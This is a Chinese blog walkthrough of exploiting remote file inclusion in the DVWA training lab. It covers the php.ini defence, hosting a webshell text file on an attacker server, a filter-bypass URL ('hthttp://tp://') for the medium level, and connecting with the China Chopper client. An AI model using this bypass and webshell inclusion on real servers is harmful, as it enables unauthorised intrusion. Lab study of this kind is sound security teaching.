html 远程包含,文件包含之远程文件包含

远程文件包含漏洞想要彻底防御,可以在服务器上的 php.ini 文件中将 allow_url_fopen 选项a把 on 改为 off

724cb8dac1ed9cf0f8f413e35688cfc7.png

owasp的文件路径为/etc/php5/cli/php.ini(各系统会根据安装路径出现异同)

远程文件包含漏洞利用的思路是自己搭建一个服务器,将文件放在自己搭建的服务器内,远程包含即可

这里使用apache;开启服务

d65e96a90360e9163a3e7d51e0745dae.png

我们在网站的主目录下建立一个文件,webshell.txt,写入一下代码

5ec85acf5c21e1bf9c07aad76b42cd4f.png

在靶机上远程包含该文件

f378bdd52f634b44b95d848166a3e4e9.png

在网站目录下可以看到webshell.php已经被创建了

b75f359c17369b268b7e9573277f7e64.png

老样子,菜刀连接

7da900a98571030bd1323d291b1fb961.png

将DVWA security等级调为 medium,后端源码限制变为:

e9dbbef3c9595469eb5e35a9feca337a.png

str_replace()函数将 http:// 字符替换为空,我们可以进行简单的绕过,

比如在url中插入http://:hthttp://tp://192.168.243.130/webshell.txt

又或者进行编码绕过,把 http:// 编码为16进制或者Unicode、ASCⅡ、URL编码等。

当DVWA security等级调为high时:

41afbae5fd5e88caad50abbe6a449b79.png

直接限制包含文件为 include.php。当前无解。

原文:https://www.cnblogs.com/luliblog/p/13398907.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值